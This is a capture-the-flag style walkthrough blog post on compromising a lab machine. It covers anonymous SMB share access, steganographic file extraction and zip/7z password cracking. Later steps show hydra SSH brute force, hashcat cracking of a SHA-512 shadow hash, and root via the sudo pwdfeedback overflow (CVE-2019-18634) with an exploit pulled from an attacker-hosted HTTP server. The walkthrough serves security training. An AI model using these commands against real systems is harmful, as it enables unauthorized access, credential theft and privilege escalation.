Complex Attack Types: Sample Scenarios 44

In this new article, we will use our cryptological abilities together with our penetration skills and attempt to infiltrate the target system.

In particular, we will learn how to manipulate the file with some tools. This article will contribute to your talent pool.

You may see that the IPs change from time to time, do not care, we will be using different machines as we progress. The entire methodology is the same.

Keep your eyes peeled and get started with this fun article, cyberpunks!

Let’s make a quick start and save the values ​​and IPs we will use most on the shell.

Register the target machine on local DNS. We will do this using the /etc/hosts file.

We are ready for other operations.

At this stage, we need to enumerate the network and machine structure in front of us. This will create opportunities for us to create an attack surface. For this, we must first use the nmap tool: nmap -sC -sV -oN nmap_result.txt -T4 -A --script=vuln -sS -Pn $target_ip

We received advisory CVE notes along with version information, open ports and the applications they are defined in. In a real scenario, every detail you find here is critical.

Port 22 — SSH (Secure Shell)

Port 139 — NetBIOS Session Service

Port 445 — NetBIOS Session Service

Our first impression is about setting up an attack scenario on SMB.

SMB, which stands for Server Message Block, is a network protocol used for providing shared access to files, printers, and serial ports between nodes on a network. It is primarily used in Microsoft Windows systems but can be implemented in Unix-like systems via software such as Samba. SMB operates over TCP/IP and uses port 445 for direct hosting over TCP/IP without the need for the NetBIOS layer. It can also use ports 137–139 via the NetBIOS over TCP/IP. SMB uses authentication to ensure that only authorized users can access shared resources. This typically involves user credentials (username and password). Modern versions of SMB (like SMB3) support encryption to protect data transmitted over the network from eavesdropping. SMB has had several high-profile vulnerabilities, such as EternalBlue, which was exploited by the WannaCry ransomware attack. Keeping SMB software up to date is crucial for security.

The first step is to check whether it accepts login without a password and how possible it is to access the shares.

Let’s scan with a tool you are not very familiar with. Our first example will be via smbmap: smbmap -H $target_ip

As you can see, there is registration on “Anonymous”.

Another example is the smbclient tool: smbclient \\\\$target_ip\\Anonymous

We got that. We don’t need to provide password.

Let’s give another example of how to enumerate this file via SMB before downloading this .txt file. We will use our nmap tool again for this: nmap -sV -A -T4 --script=smb-enum-shares $target_ip

As you can see, there are similar findings. To get a slightly more detailed output, you can choose the enum4linux tool: enum4linux $target_ip -a -r -o -i

Let’s download this file again with a command: smbmap -H $target_ip --download ‘Anonymous/journal.txt’

You can also do this through the SMB client from which you connect.

Let’s give an example from Metasploit. We will use auxiliary/scanner/smb/smb_enumshares as the module. Run msfconsole with msfconsole -q command. Then use this module.

Provide the required parameters.

Just run it.

Let’s look at the content and definition of this file we obtained.

It appears in text format, but when you examine it carefully, you will see that it resembles Base64 format. You can decode using the following command: cat journal.txt | base64 -d

Did you see PNG header? The file entry id expressed PNG in hex.

Now we can directly save this as a separate file.

It looks like a PNG image data.

There are many commands or tools with which you can analyze this. For example, here is the link to the toolkit: https://github.com/DominicBreuker/stego-toolkit

You can use the .sh files inside.

Use check_png.sh script.

This gives you many outputs. You should examine them all in detail. The detail that catches our eye is that the file size is larger than we expected. It is 2.6 MB.

First, let’s see what’s hidden in the content. zsteg is a tool used for detecting hidden data (steganography) in PNG and BMP image files. It is particularly useful in the field of digital forensics and cybersecurity for uncovering hidden messages or data that might be embedded within image files using various steganographic techniques.

There are many keys containing secrets.

stegpy is a Python-based tool used for steganography, which is the practice of hiding data within other non-secret data, typically in image files. stegpy specifically allows you to hide and extract messages or files within image files using Python.

We got a .zip file as the output of this command. Let’s unzip.

Ops… It is seen as a .zip file, but we get a format and offset error. We need to investigate this.

JPEG image data? What is going on here? We can obtain details using the exiftool tool.

Did you see the message from “warning” section? It looks like this file has been tampered with.

For more details and methods, check out this resource: https://book.hacktricks.xyz/crypto-and-stego/stego-tricks

To extract this .zip file correctly, we must look at the hex layout. For this we need the hexeditor tool.

This is in an editable format. You must be careful when making changes here, otherwise you may damage the integrity of the entire file.

“Magic number” is important in file definitions.

A “magic number” is a specific sequence of bytes at the beginning of a file that uniquely identifies the file format. These bytes help software and operating systems recognize and correctly handle different file types.

The magic number for a PNG file is the first 8 bytes: 89 50 4E 47 0D 0A 1A 0A

JPEG/JFIF (JPEG File Interchange Format): FF D8 FF E0

JPEG/Exif (Exchangeable Image File Format): FF D8 FF E1

The bytes FF D8 mark the start of a JPEG file as you can see in our result. But this must have .zip file format.

The magic number for a standard .zip file is: 50 4B 03 04

This sequence of bytes appears at the beginning of the file and is used to identify the file as a .zip archive.

Check this source more file signatures: https://en.wikipedia.org/wiki/List_of_file_signatures

Let’s adjust this byte order according to the .zip file.

Then save it.

Yes! We converted this manipulated file to .zip format, but we encountered a password obstacle. Let’s move on to the next stage.

We will perform brute-force to crack this .zip file.

Try this command: fcrackzip -v -b -D -u -p $wordlist_add_pass _journal.zip

It happened very quickly. We now have the password. Then unzip again.

We have file now.

A .ctz file is a compressed file format used by the Citrix Receiver, a client software that allows users to connect to virtual desktops and applications provided by Citrix servers. The .ctz extension is commonly associated with compressed configuration files or other data used by Citrix applications.

Try to get this.

We need to have a cracking process again.

We can choose the 7z2john.pl tool, which we have not used before.

The 7z2john.pl tool is a script used to extract hash data from 7-Zip (.7z) archive files for the purpose of password cracking. It is part of the John the Ripper (JtR) password cracking tool suite, which is widely used in security research and penetration testing. Before running this you must meet the requirements: sudo apt-get install -y libcompress-raw-lzma-perl

We will use this command: /usr/share/john/7z2john.pl journal.ctz > johnhashout

We need to break this value using the john tool: sudo john --wordlist=$wordlist_add_pass johnhashout

You will get the password in this way.

Now extract file again.

We have file now.

The new file we get is the XML file. We need to view this.

You can use CherryTree: sudo apt-get install cherrytree

We have access to the file. Save these internal files. And note everything.

When you examine the files in detail, you will see a user named “lily”.

Take a look at the files you obtained.

These look like password files. Remember that the SSH port is open, we can try a brute force on it.

Use: hydra -l lily -P cherry-blossom.list ssh://10.10.254.137 -V -f -e ns

The answer may take a while. You must be patient.

As a result you will get the password. Now let’s get a connection via SSH.

Yes! We are in.

Now it’s time to navigate a little and explore the system.

Backup files are quite attractive…

.bak files are backup files that are commonly created to preserve the original state of a file before it is modified. They are used as a safeguard to allow recovery of the original file if needed. In the context of the files listed in your example, these are backups of important system files on a Unix/Linux system.

Let’s examine these.

Wow! There are hashed passwords. Note these.

Let’s break this down as an example: $6$zV7zbU1b$FomT/aM2UMXqNnqspi57K/hHBG8DkyACiV6ykYmxsZG.vLALyf7kjsqYjwW391j1bue2/.SVm91uno5DUX7ob0

First, determine what this hash is.

We have SHA-512. We will use hashcat for this: hashcat -m1800 -a0 --force ‘$6$zV7zbU1b$FomT/aM2UMXqNnqspi57K/hHBG8DkyACiV6ykYmxsZG.vLALyf7kjsqYjwW391j1bue2/.SVm91uno5DUX7ob0’ cherry-blossom.list

Again, be patient and wait for the result. It will give you a broken value.

Once you have the password, you just need to change the user.

Check privilege level for that user.

Same password but ‘*’ appears… This does not enable command entry.

“pwdfeedback” typically refers to the feature in a command-line interface (CLI) or terminal that provides feedback or visual cues when you are typing a password. This feedback can vary depending on the system or terminal emulator but often includes things like masking the characters (showing asterisks or dots instead of the actual characters) to protect the password from being visually exposed to others.

Before going into this in detail, let’s take a look at root access: find / -perm -4000 -user root -type f 2> /dev/null

What is “sudo” version:

So is there an exploit for “pwdfeedback” for this sudo version? Check it.

Yes! We found. It is defined as CVE-2019–18634.

Download the script and review it.

You can run this by installing it on the target machine. Or let’s do manual operations.

Check perl:

You can use it: perl -e ‘print((“A” x 100 . “\x{00}”) x 50)’ | sudo -S /bin/bash

Yeap! We got Segmentation Fault error. Proof that this system is vulnerable to buffer overflow.

Now let’s try to get root permission through this.

You can find a valid exploit script for this. We found this: https://github.com/saleemrashid/sudo-cve-2019-18634

First of all, you need to download it locally.

Then compile .c file.

Activate HTTP server: python3 -m http.server

Request this file from the hijacked machine to your own HTTP server.

Yes, we transferred the file. You must authorize this with chmod.

All you have to do is run it.

Yes! We are root now.

Let’s give some additional information.

If you are getting such an error, use the system’s own compile layout. To do this, you must first transfer the .c file to the target system.

Now compile via target system layout.

Then run it.

Don’t give up on hacking.

Code for good.

^-^